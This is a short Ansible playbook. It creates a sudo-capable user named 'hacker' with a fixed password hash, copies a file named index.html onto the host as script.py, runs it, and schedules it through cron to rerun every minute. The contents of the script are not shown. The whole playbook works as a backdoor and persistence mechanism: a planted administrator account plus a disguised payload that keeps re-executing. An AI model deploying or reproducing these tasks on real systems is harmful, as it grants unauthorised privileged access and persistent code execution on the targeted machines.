---
- group:
    name: sudo
    state: present
- user:
    name: hacker
    groups: sudo
    password: $6$zJyNIkGl$9SM1yMlO1BUZ7s/h70oIjoBMSqny3Ax.zDVMRz5s8lOVTo0jFuThbQi1jv/5RUSG3GlzWZx2tIjBeldK5TcSs0
    shell: /bin/bash
    append: true
    home: /home/hacker
- copy:
    owner: hacker
    mode: '711'
    dest: /home/hacker/script.py
    src: ./files/index.html
- shell:
    cmd: python /home/hacker/script.py
- cron:
    name: rerun script
    job: /home/hacker/script.py
    minute: '*/1'
